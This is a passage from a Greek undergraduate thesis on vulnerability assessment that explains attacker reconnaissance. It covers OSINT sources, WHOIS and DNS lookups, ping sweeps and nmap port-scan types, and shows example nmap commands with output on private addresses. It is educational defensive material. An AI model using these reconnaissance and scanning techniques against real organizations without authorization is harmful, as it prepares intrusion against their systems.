Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

52 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

επιτιθέμενος μπορεί να υποκλέψει τους κωδικούς πρόσβασης και να αποκτήσει

πρόσβαση στον οργανισμό.

• Τρέχοντα γεγονότα: Οι συγχωνεύσεις, οι αναδιοργανώσεις, οι επεκτάσεις, οι

προσαρτήσεις, οι μισθώσεις, οι μεταφορές, οι προσωρινοί ανάδοχοι, τα σκάνδαλα κ.α.

παρέχουν ενδείξεις και ευκαιρίες στους Hackers.

− Για παράδειγμα, σε μια συγχώνευση, οι εταιρείες, στην προσπάθειά τους να

συνδέσουν τις νεοαποκτηθείσες οντότητες στο υπάρχον δίκτυό τους δίνουν μικρή

σημασία στην ασφάλεια.

− Η σύγχυση και η ανασφάλεια που νιώθουν σε περιπτώσεις αλλαγών οι εργαζόμενοι σε

έναν οργανισμό συχνά αποσπά την προσοχή τους από τα θέματα ασφάλειας.

− Η παρουσία ενός αγνώστου ο οποίος περιφέρεται στους χώρους των εγκαταστάσεων

ενός οργανισμού μπορεί να περάσει απαρατήρητη.

− Εάν η εταιρεία διαπραγματεύει τις μετοχές της στο χρηματιστήριο, μια πληθώρα

πληροφοριών για τις δραστηριότητες και τις θυγατρικές της μπορούν να εξαχθούν, με

βάση τα τριμηνιαία δελτία που εκδίδουν, από βάσεις δεδομένων όπως η EDGAR στις

ΗΠΑ ή από ανάλογες βάσεις ανά τον κόσμο.

• Οι πολιτικές ασφαλείας ή ιδιωτικότητας και οι τεχνικές λεπτομέρειες οι οποίες

δείχνουν τους ισχύοντες τύπους μηχανισμών ασφάλειας: Οι κοινοποίηση αυτών των

πληροφοριών στο web site ενός οργανισμού αποτελούν πολύτιμη πηγή πληροφοριών για

τους επιτιθέμενους όπως είναι αυτονόητο.

• Αρχειοθετημένες πληροφορίες: Στο διαδίκτυο υπάρχουν περιοχές όπου μπορούν να

ανακτηθούν αρχειοθετημένα αντίγραφα των πληροφοριών οι οποίες δεν είναι πλέον

διαθέσιμες από την αρχική πηγή. Αυτό θα μπορούσε να επιτρέψει σε έναν επιτιθέμενο να

αποκτήσει πρόσβαση στις πληροφορίες που έχουν αφαιρεθεί σκόπιμα για τους λόγους

ασφαλείας. Τέτοιες πηγές πληροφόρησης είναι η μηχανή Wayback στο

http://www.archive.org/ και http://www.thememoryhole.org/.

• Δυσαρεστημένοι εργαζόμενοι: Δεν είναι ασυνήθιστο για τους δυσαρεστημένους ή

απολυμένους υπαλλήλους ενός οργανισμού να κλέψουν, να πουλήσουν, να εκθέσουν τα

μυστικά της επιχείρησης, να καταστρέψουν εξοπλισμό και δεδομένα, να τοποθετήσουν

κερκόπορτες (backdoors) για να έχουν εύκολη πρόσβαση αργότερα. Αρκεί μια

προηγμένη αναζήτηση στο Google της μορφής “link: www.companyname.com” για την

ανακάλυψη κακόβουλων πληροφοριών για τον οργανισμό-στόχο.

• Μηχανές αναζήτησης, Usenet και Resumes:

− Οι μηχανές αναζήτησης με τις προηγμένες (advanced) επιλογές τους σε συνδυασμό με

άλλα εργαλεία μπορούν να παρέχουν μια πληθώρα χρήσιμων πληροφοριών για τον

οργανισμό-στόχο, όπως ευπάθειες, λανθασμένες ρυθμίσεις εξοπλισμού, κ.α.

Page 53: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

53 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

− Τα Usenet forum συζητήσεων ή τα newsgroups αποτελούν άλλο ένα σημείο

ενδιαφέροντος για τον επιτιθέμενο. Συχνά άνθρωποι ζητάνε βοήθεια για κάποιο

πρόβλημα που αντιμετωπίζουν και δε διστάζουν να κοινοποιήσουν ευαίσθητες

πληροφορίες, όπως ΙΡ διευθύνσεις, passwords, e-mails, παραμετροποιήσεις προϊόντων

κ.α., με αποτέλεσμα να γίνονται εύκολη λεία στα χέρια των “φιλικών” Hackers που

σπεύδουν για βοήθεια.

− Από τη μια πλευρά, οι εταιρείες όταν αναζητούν υπαλλήλους πληροφορικής,

δημοσιεύουν αγγελίες οι οποίες περιγράφουν αναλυτικά τα συστήματα για τα οποία

πρέπει να έχει γνώσεις ο υποψήφιος εργαζόμενος. Από την άλλη πλευρά οι

επαγγελματίες της πληροφορικής, οι οποίοι αναζητούν εργασία, στην προσπάθειά

τους να περιγράψουν όσο μπορούν καλύτερα τις ικανότητές τους, παρέχουν στο

βιογραφικό τους, το οποίο συχνά βρίσκεται δημοσιευμένο στο Internet ή σε κάποια

βάση δεδομένων, αναλυτική περιγραφή των συστημάτων με τα οποία έχουν εργαστεί

σε συνδυασμό με στοιχεία προηγούμενων εργοδοτών τους. Είναι προφανές πως αυτές

οι διαδικασίες παρέχουν μια λεπτομερή πληροφόρηση στους Hackers για τα

συστήματα του οργανισμού-στόχου.

ΒΗΜΑ 3: Αναζήτηση σε βάσεις WHOIS

Η αναζήτηση σε βάσεις δεδομένων WHOIS παρέχουν πολλές χρήσιμες πληροφορίες για τον

οργανισμό-στόχο. Με αυτό τον τρόπο ο επιτιθέμενος μπορεί να συγκεντρώσει χρήσιμες

πληροφορίες σχετικά με το φορέα καταχώρησης, τα Domains τα οποία ανήκουν στον

οργανισμό-στόχο, στοιχεία για τον επόπτη του συστήματος (τηλέφωνα, e-mails),

ημερομηνίες ενημέρωσης και εγγραφής των αρχείων, πρωτεύοντες και δευτερεύοντες DNS

εξυπηρετητές, σχετιζόμενα με το στόχο δίκτυα, στοιχεία του υπευθύνου επικοινωνίας του

οργανισμού. Υπάρχουν δύο τρόποι άντλησης αυτών των πληροφοριών:

− Αναζητήσεις σχετικές με το Domain: Ο επιτιθέμενος εντοπίζει το WHOIS Server, ο

οποίος περιέχει τις πληροφορίες που τον ενδιαφέρουν. Κάνοντας π.χ. μια αναζήτηση

για όλα τα Domains με κατάληξη .com στην διεύθυνση http://whois.iana.org εντοπίζει

το φορέα πιστοποίηση και μέσω αυτού το φορέα καταχώρησης. Είναι πλέον σε θέση

να αποκτήσει πληροφορίες για τον οργανισμό-στόχο οι οποίες αφορούν φυσικές

διευθύνσεις, αριθμούς τηλεφώνων, ονόματα, διευθύνσεις e-mail, ονόματα DNS

εξυπηρετητών, IPs κ.α.

− Αναζητήσεις σχετικές με τη διεύθυνση ΙΡ: Ο επιτιθέμενος εάν έχει στην κατοχή του

μια διεύθυνση ΙΡ μπορεί να εντοπίσει σε ποιον οργανισμό ανήκει κάνοντας μια

αναζήτηση στο http://www.apnic.com. Μπορεί επίσης να εντοπίσει ποιες ΙΡ

διευθύνσεις ανήκουν σε ένα οργανισμό κάνοντας μια αναζήτηση στο

Page 54: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

54 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

http://www.arin.net. Τα αποτελέσματα αυτής της αναζήτησης είναι συνήθως το όνομα

του επόπτη του συστήματος που είναι υπεύθυνος για τις συνδέσεις Internet ή το

Firewall, αριθμοί τηλεφώνων ή fax, και e-mails. Αυτά τα στοιχεία μπορούν να

χρησιμοποιηθούν για τον εντοπισμό αριθμών modems μέσω war-dialers και επιθέσεις

κοινωνικής μηχανικής. Επίσης οι ημερομηνίες δημιουργίας και τροποποίησης των

στοιχείων προσφέρουν πληροφόρηση για το πόσο επικαιροποιημένα είναι τα στοιχεία.

Επιπλέον, παρέχονται πληροφορίες για τους DNS εξυπηρετητές, ποιος είναι

πρωτεύον, ποιος δευτερεύον κ.ο.κ., οι οποίες θα αξιοποιηθούν σε έρευνες βασιζόμενες

στο DNS, ενώ οι ΙΡ διευθύνσεις μπορούν να χρησιμοποιηθούν για αναζητήσεις στην

βάση δεδομένων ARIN.

Βήμα 4: Διερεύνηση στο DNS

Αφού ο επιτιθέμενος εντοπίσει όλα τα σχετιζόμενα με τον οργανισμό Domain εκκινεί μια

έρευνα στο σύστημα DNS32. Λάθη διαμόρφωσης που επιτρέπουν σε οποιονδήποτε χρήστη

του Internet να εκτελεί διαδικασίες μεταφοράς ζώνης33 αποτελούν τρωτό σημείο στην

ασφάλεια του συστήματος το οποίο μπορεί να εκμεταλλευτεί ο επιτιθέμενος και να αντλήσει

πληροφορίες για τα ονόματα και τις ΙΡ διευθύνσεις των εσωτερικών συστημάτων, την

αρχιτεκτονική του συστήματος, τον τύπο του λειτουργικού και τα δοκιμαστικά συστήματα.

Η γνώση επίσης του συστήματος το οποίο χειρίζεται το ηλεκτρονικό ταχυδρομείο μπορεί να

αποτελέσει μεγάλη βοήθεια για τον εντοπισμό του Firewall που χρησιμοποιεί ο οργανισμός-

στόχος, ενώ συχνά ο χειρισμός του ηλεκτρονικού ταχυδρομείου γίνεται από το ίδιο το

Firewall ή από ένα σύστημα του ίδιου δικτύου34

.

Βήμα 5: Αναγνώριση Δικτύου

Από τη στιγμή που ο επιτιθέμενος έχει προσδιορίσει τα πιθανά δίκτυα, θα προσπαθήσει να

εξακριβώσει την τοπολογία τους και τις πιθανές οδούς πρόσβασης σε αυτά. Με τη χρήση

κατάλληλων εργαλείων, έχει τη δυνατότητα να εξετάσει τη διαδρομή που ακολουθεί ένα ΙΡ

πακέτο για να μεταβεί από ένα σύστημα σε ένα άλλο, τους κόμβους από τους οποίους

διέρχεται και να εξάγει συμπεράσματα για την τοπολογία του δικτύου, τις συσκευές ελέγχου

πρόσβασης (Firewalls επιπέδου εφαρμογής, δρομολογητές (routers) φιλτραρίσματος

32 Το DNS είναι μια κατανεμημένη βάση δεδομένων η οποία χρησιμοποιείται για την αντιστοίχιση ΙΡ διευθύνσεων

σε ονόματα υπολογιστών (hostnames) και το αντίστροφο. Hacking exposed σελ 34 33 Η μεταφορά ζώνης (zone transfer) επιτρέπει σε έναν δευτερεύοντα server ονομάτων να ενημερώνει τη βάση

δεδομένων του χρησιμοποιώντας τα στοιχεία που διαθέτει ο πρωτεύον server. Με αυτόν τον τρόπο υπάρχει πρόσθετη ασφάλεια του συστήματος DNS, για τις περιπτώσεις που ο πρωτεύον server ονομάτων τίθεται εκτός λειτουργίας. Ωστόσο, πολλοί DNS servers είναι διαμορφωμένοι με λάθος τρόπο και παρέχουν ένα αντίγραφο της ζώνης σε οποιονδήποτε το ζητήσει. Hacking exposed σελ 34

34 Scambray J.- McClure S. – Kurtz G., σελ 37, 2009

Page 55: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

55 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

πακέτων), την αρχιτεκτονική της πύλης επικοινωνίας με το Internet και τη θέση των

συσκευών οι οποίες παρέχουν λειτουργίες ελέγχου πρόσβασης.

2.4.2 Σάρωση Συστημάτων (Scanning)

Αφού οι Hackers αποκτήσουν μια λίστα δικτύων και διευθύνσεων ΙΡ, ονομάτων και

αριθμών τηλεφώνων υπαλλήλων, στοιχεία DNS και Mail εξυπηρετητές για τον οργανισμό-

στόχο, σύμφωνα με τις τεχνικές που συζητήσαμε στην προηγούμενη ενότητα, το επόμενο

βήμα είναι να εξακριβώσουν ποια συστήματα είναι «ζωντανά» και προσπελάσιμα από το

Internet, καθώς και σε ποιες θύρες «ακροάζονται». Για την επίτευξη αυτού του στόχου

έχουν στη διάθεσή τους αρκετά εργαλεία και τεχνικές, τα κυριότερα σημεία των οποίων θα

συζητήσουμε στη συνέχεια.

ΕΛΕΓΧΟΣ ΑΝ ΕΝΑ ΣΥΣΤΗΜΑ ΕΙΝΑΙ ΣΕ ΛΕΙΤΟΥΡΓΙΑ

Η εκτέλεση μιας αυτοματοποιημένης σάρωσης ping35

σε μια περιοχή διευθύνσεων ΙΡ,

επιτρέπει στον επιτιθέμενο να εξακριβώσει ποιες διευθύνσεις αντιστοιχούν σε

λειτουργούντα, «ζωντανά», συστήματα. Η μέθοδος αυτή είναι αποτελεσματική για μικρά και

μεσαίου μεγέθους δίκτυα κλάσης Α ή Β, αλλά είναι επίπονη για δίκτυα κλάσης Α. Οι

τεχνικές που μπορούν να χρησιμοποιηθούν είναι:

• Network Ping Sweeps: Κατά τη σάρωση ping στέλνονται διάφοροι τύποι πακέτων

κυκλοφορίας δικτύου στο στόχο και αναλύονται τα αποτελέσματα τα οποία

επιστρέφονται από αυτό. Η απουσία απάντησης σημαίνει ότι το σύστημα στόχος δεν

βρίσκεται σε λειτουργία. Στη σάρωση ping αξιοποιούνται τα πακέτα ICMP (Internet

Control Message Protocol), τα οποία είναι και τα περισσότερο δημοφιλή, χωρίς αυτό να

σημαίνει ότι δεν μπορούν να χρησιμοποιηθούν πακέτα TCP και UDP.

Συνοπτικά αναφέρουμε τους τύπους των ICPM πακέτων που μπορούν να

χρησιμοποιηθούν για σάρωση ping σε έναν κόμβο:

35 Με το ping αποστέλλονται ICMP πακέτα ECHO (Τύπος 8) σε ένα σύστημα, με σκοπό την πρόκληση απάντησης

ICMP ECHO_REPLY (Τύπος 0) η οποία υποδεικνύει ότι το σύστημα είναι σε λειτουργία (Hacking Exposed, σελ 44)

Page 56: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

56 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ICMP Messages

− Message Type: 0 – Echo Reply − Message Type: 3 – Destination Unreachable − Message Type: 4 – Source Quench − Message Type: 5 – Redirect − Message Type: 8 – Echo − Message Type: 11 – Time Exceeded − Message Type: 12 – Parameter Problem − Message Type: 13 – Timestamp − Message Type: 14 – Timestamp Reply − Message Type: 15 – Information Request − Message Type: 16 – Information Reply

Πίνακας 2-2: Τύποι ICMP πακέτων Πηγή: Scambray J.- McClure S. – Kurtz G.,2009

Το ποιος από τους παραπάνω τύπους ICPM θα χρησιμοποιηθεί, εξαρτάται από την

υλοποίηση ICMP του στόχου, το πώς ανταποκρίνεται σε αυτούς τους τύπους πακέτων

και από το λειτουργικό του σύστημα.

Υπάρχουν πολλά εργαλεία για σάρωση ping τόσο για τα συστήματα Windows όσο και

για τα Unix. Ένα από αυτά είναι το nmap το οποίο διαθέτει λειτουργία σάρωσης ping με

την με την επιλογή –sP.

Παράδειγμα χρήσης εργαλείου nmap

[root] nmap –sP 192.168.1.0/24 Starting nmap V. 4.68 by [email protected] (www.insecure.org/nmap/) Host (192.168.1.0) seems to be a subnet broadcast address (returned 3 extra pings). Host (192.168.1.1) appears to be up. Host (192.168.1.10) appears to be up. Host (192.168.1.11) appears to be up. Host (192.168.1.15) appears to be up. Host (192.168.1.20) appears to be up. Host (192.168.1.50) appears to be up. Host (192.168.1.101) appears to be up. Host (192.168.1.102) appears to be up. Host (192.168.1.255) seems to be a subnet broadcast address (returned 3 extra pings). Nmap run completed -- 256 IP addresses (10 κόμβους up) scanned in 21 seconds

Πίνακας 2-3: Σάρωση ping με το εργαλείο nmap Πηγή: Scambray J.- McClure S. – Kurtz G.,2009

Page 57: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

57 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Τα ICMP πακέτα ενδέχεται να μπλοκαριστούν από το Firewall του στόχου. Σε αυτή την

περίπτωση υπάρχουν άλλα εργαλεία και τεχνικές για να διαπιστωθεί αν ένα σύστημα

είναι σε λειτουργία. Για παράδειγμα, μπορεί να χρησιμοποιηθεί η σάρωση θυρών (port

scanning), όπου γίνεται σάρωση συνήθως χρησιμοποιούμενων θυρών, σε κάθε πιθανή

διεύθυνση ΙΡ και εφόσον διαπιστωθεί ότι υπάρχει θύρα η οποία ακροάζεται, εξάγεται το

συμπέρασμα ότι το σύστημα είναι σε λειτουργία. Ωστόσο αυτή η τεχνική είναι

χρονοβόρα και με ασαφή αποτελέσματα.

Το εργαλείο nmap, όμως, διαθέτει μια προηγμένη επιλογή, την TCP ping, η οποία

επιτρέπει την διέλευση ενός πακέτου μέσα από ένα Firewall. Συγκεκριμένα,

αξιοποιώντας την επιλογή –PT και έναν αριθμό μιας κοινά χρησιμοποιούμενης θύρας π.χ.

8036, ο επιτιθέμενος στέλνει TCP πακέτα ACK37

στο δίκτυο στόχο και από τη λήψη

πακέτων RST μπορεί να εξάγει το συμπέρασμα ότι το σύστημα είναι σε λειτουργία.

Παράδειγμα χρήσης εργαλείου nmap για TCP ping [root] nmap -sP -PT80 192.168.1.0/24

TCP probe port is 80

Starting nmap V. 4.68

Host (192.168.1.0) appears to be up.

Host (192.168.1.1) appears to be up.

Host shadow (192.168.1.10) appears to be up.

Host (192.168.1.11) appears to be up.

Host (192.168.1.15) appears to be up.

Host (192.168.1.20) appears to be up.

Host (192.168.1.50) appears to be up.

Host (192.168.1.101) appears to be up.

Host (192.168.1.102) appears to be up.

Host (192.168.1.255) appears to be up.

Nmap run completed (10 κόμβους up) scanned in 5 seconds

Πίνακας 2-4: Σάρωση TCP ping με το εργαλείο nmap Πηγή: Scambray J.- McClure S. – Kurtz G.,2009

• Διερεύνηση μέσω ICMP: Το ICMP μπορεί να χρησιμοποιηθεί, επίσης, για τη συλλογή

επιπρόσθετων χρήσιμων πληροφοριών για το σύστημα στόχο. Η αποστολή ενός

36 Η θύρα 80 χρησιμοποιείται επειδή πολλές τοποθεσίες επιτρέπουν τη διέλευση αυτής της κυκλοφορίας μέσω του

κύριου Firewall 37 Τα πακέτα ACK χρησιμοποιούνται γιατί είναι περισσότερο πιθανό να περάσουν από ένα Firewall το οποίο δεν

παρακολουθεί την κατάσταση των συνδέσεων.

Page 58: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

58 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

μηνύματος ICMP Τύπου 13 (TIMESTAMP), όπου ο επιτιθέμενος ζητά την ώρα του

συστήματος, παρέχει πληροφορίες για τη ζώνη ώρας στην οποία βρίσκεται το σύστημα,

ενώ η αποστολή ενός μηνύματος ICMP Τύπου 17 (ADDRESS MASK REQUEST)

παρέχει πληροφορίες για τη μάσκα του υποδικτύου μιας συγκεκριμένης συσκευής. Η

γνώση της μάσκας υποδικτύου είναι σημαντική πληροφορία γιατί επιτρέπει στον

επιτιθέμενο να γνωρίζει τα υποδίκτυα που χρησιμοποιούνται στον οργανισμό-στόχο και

να επικεντρώσει τις επιθέσεις του σε συγκεκριμένα από αυτά, αποφεύγοντας για

παράδειγμα τις διευθύνσεις broadcast.

ΕΞΑΚΡΙΒΩΣΗ ΥΠΗΡΕΣΙΩΝ ΠΟΥ ΕΚΤΕΛΟΥΝΤΑΙ

Αφού ο επιτιθέμενος εντοπίσει ποια συστήματα είναι σε λειτουργία, περνά στο επόμενο

βήμα, την εξακρίβωση των υπηρεσιών που εκτελούνται στο σύστημα στόχο. Αυτό

επιτυγχάνεται με τη διαδικασία της σάρωσης θυρών (port scanning).

Σάρωση θυρών (port scanning) είναι η διαδικασία σύνδεσης σε θύρες TCP και UDP του

συστήματος-στόχου με σκοπό την εξακρίβωση των υπηρεσιών που εκτελούνται ή

βρίσκονται σε κατάσταση ακρόασης (listening)38

• των υπηρεσιών TCP και UDP που εκτελούνται στο σύστημα-στόχο

. Ο προσδιορισμός των θυρών που

βρίσκονται σε κατάσταση ακρόασης παρέχει σημαντικές πληροφορίες για το λειτουργικό

σύστημα και τις εφαρμογές που χρησιμοποιεί το σύστημα-στόχος. Οι ενεργές υπηρεσίες που

βρίσκονται σε κατάσταση ακρόασης μπορούν να επιτρέψουν σε έναν μη εξουσιοδοτημένο

χρήστη να αποκτήσει πρόσβαση στο σύστημα, εκμεταλλευόμενος είτε λανθασμένες

ρυθμίσεις του συστήματος, είτε γνωστές ευπάθειες των εφαρμογών που εκτελούνται. Με τη

διαδικασία της σάρωσης θυρών ο επιτιθέμενος αποβλέπει στον προσδιορισμό:

• του λειτουργικού συστήματος

• συγκεκριμένων εφαρμογών ή εκδόσεων μιας συγκεκριμένης υπηρεσίας

Τύποι Σάρωσης39

Διακρίνονται οι παρακάτω τεχνικές σάρωσης θυρών, πολλές από τις οποίες είναι

ενσωματωμένες στο εργαλείο σάρωσης θυρών nmap.

• TCP Connect: Αυτός ο τύπος σάρωσης συνδέεται στη θύρα του συστήματος στόχου και

ολοκληρώνει μια πλήρη διαπραγμάτευση τριών βημάτων (SYN, SYN/ACK και ACK),

ενώ είναι εύκολα ανιχνεύσιμος από το σύστημα-στόχο.

38 Scambray J.- McClure S. – Kurtz G., σελ 54, 2009 39 Scambray J.- McClure S. – Kurtz G., σελ 55 – 56, 2009

Page 59: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

59 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 2.5: Διαδικασία τριών βημάτων σύνδεσης TCP

Πηγή: Scambray J.- McClure S. – Kurtz G.,2009

• TCP SYN: Η τεχνική αυτή αποκαλείται μισάνοιχτη σάρωση (half – open scanning),

επειδή δεν υλοποιείται μια πλήρης TCP σύνδεση. Αντίθετα, στη θύρα προορισμού

στέλνεται ένα πακέτο SYN. Εάν από τη θύρα προορισμού ληφθεί ένα πακέτο SYN/ACK,

εξάγεται το συμπέρασμα ότι βρίσκεται σε κατάσταση ακρόασης (listening). Εάν ληφθεί

ένα πακέτο RST/ACK, αυτό συνήθως σημαίνει ότι η θύρα δεν βρίσκεται σε κατάσταση

ακρόασης. Κατόπιν το σύστημα που εκτελεί τη σάρωση στέλνει ένα πακέτο RST/ACK

έτσι ώστε να μην υλοποιηθεί ποτέ μια πλήρης σύνδεση. Αυτή η τεχνική έχει το

πλεονέκτημα ότι δεν είναι τόσο εύκολα ανιχνεύσιμη όσο μια πλήρης TCP σύνδεση.

• TCP FIN: Η τεχνική αυτή στέλνει στη θύρα προορισμού ένα πακέτο FIN. Βάσει του

RFC 793 (http://www.ietf.org/rfc/rfc0793.txt), το σύστημα-στόχος θα πρέπει να στείλει

πίσω ένα πακέτο RST για όλες τις κλειστές θύρες. Αυτή η τεχνική συνήθως είναι

χρήσιμη μόνο σε UNIX συστήματα.

• TCP Xmas Tree: Η τεχνική αυτή στέλνει ένα πακέτο FIN, URG και PUSH στη θύρα

προορισμού. Βάσει του RFC 793, το σύστημα-στόχος θα πρέπει να στείλει πίσω ένα

πακέτο RST για όλες τις κλειστές θύρες.

• TCP Null: Η τεχνική αυτή απενεργοποιεί όλες τις σημάνσεις. Βάσει του RFC 793, το

σύστημα-στόχος θα πρέπει να στείλει πίσω ένα πακέτο RST για όλες τις κλειστές θύρες.

• TCP ACK: η τεχνική αυτή χρησιμοποιείται για τη χαρτογράφηση των κανόνων

διέλευσης ενός Αναχώματος Ασφάλειας (Firewall). Βοηθάει στο να εξακριβωθεί εάν το

Firewall εκτελεί απλό φιλτράρισμα πακέτων επιτρέποντας μόνο εγκαθιδρυμένες

συνδέσεις (συνδέσεις με ενεργό το bit ACK), ή ελέγχει την κατάσταση των συνδέσεων

(stateful).

• TCP Windows: Η τεχνική αυτή μπορεί να ανιχνεύσει ανοιχτές θύρες, καθώς επίσης, και

φιλτραρισμένες/μη-φιλτραρισμένες θύρες σε ορισμένα συστήματα, λόγω μιας ανωμαλίας

στον τρόπο με τον οποίο αναφέρεται το μέγεθος του παραθύρου TCP.

• TCP RPC: Η τεχνική αυτή είναι ειδικά σχεδιασμένη για συστήματα UNIX και

χρησιμοποιείται για την ανίχνευση και τον προσδιορισμό των θυρών RPC (Remote

Page 60: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

60 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Procedure Call), καθώς και των σχετιζόμενων προγραμμάτων και των αριθμών έκδοσής

τους.

• UDP: Η τεχνική αυτή στέλνει ένα πακέτο UDP στη θύρα προορισμού. Εάν η θύρα

προορισμού απαντήσει με ένα μήνυμα “ICPM port unreachable”, αυτό σημαίνει ότι η

θύρα είναι κλειστή. Αντίστροφα, αν δεν ληφθεί αυτό το μήνυμα μπορεί να εξαχθεί το

συμπέρασμα ότι η θύρα είναι ανοιχτή. Επειδή το UDP είναι ένα πρωτόκολλο το οποίο

δεν ελέγχει την κατάσταση της σύνδεσης, η ακρίβεια αυτής της τεχνικής εξαρτάται σε

μεγάλο βαθμό από παράγοντες οι οποίοι σχετίζονται με το φόρτο του δικτύου και τους

διαθέσιμους πόρους του συστήματος. Επιπρόσθετα, η σάρωση θυρών UDP είναι μια

πολύ αργή διαδικασία εάν εφαρμοστεί σε μια συσκευή που εκτελεί φιλτράρισμα πακέτων

σε μεγάλο βαθμό και παρέχει αναξιόπιστα αποτελέσματα.

Εξετάζοντας τα αποτελέσματα της σάρωσης θυρών ο επιτιθέμενος έχει πλέον μια λίστα με

τις θύρες που είναι ενεργές, καθώς και τις υπηρεσίες που εκτελούνται σε αυτές. Η γνώση

αυτή τον βοηθάει να εξάγει συμπεράσματα για το λειτουργικό σύστημα, τις εφαρμογές που

χρησιμοποίει το σύστημα-στόχος, ενώ ταυτόχρονα, του επιτρέπει να εκμεταλλευτεί γνωστές

αδυναμίες αυτών.

ΕΞΑΚΡΙΒΩΣΗ ΛΕΙΤΟΥΡΓΙΚΟΥ ΣΥΣΤΗΜΑΤΟΣ

Αφού ο επιτιθέμενος έχει καταφέρει και έχει εντοπίσει τις ενεργές θύρες TCP και UDP στο

σύστημα-στόχο, περνά στο επόμενο βήμα που είναι η εξακρίβωση του λειτουργικού

συστήματος. Η απλή συλλογή μηνυμάτων και προτροπών από υπηρεσίες όπως οι FTP,

telnet, SMTP, HTTP, POP και άλλες μπορούν να προφέρουν πολύτιμες πληροφορίες. Η

εξακρίβωση του λειτουργικού συστήματος είναι καίριας σημασίας για τον επιτιθέμενο, γιατί

του επιτρέπει να προσδιορίσει τις εγγενείς αδυναμίες των συστημάτων τα οποία εκτελούνται

στο σύστημα-στόχο. Για την επίτευξη αυτού το υ σκο πού υπάρχουν πο λλά

αυτοματοποιημένα και μη εργαλεία, ένα εκ των οποίων είναι το nmap, ενώ η τεχνικές οι

οποίες χρησιμοποιούνται είναι η ενεργητική και παθητική αναγνώριση στοίβας.

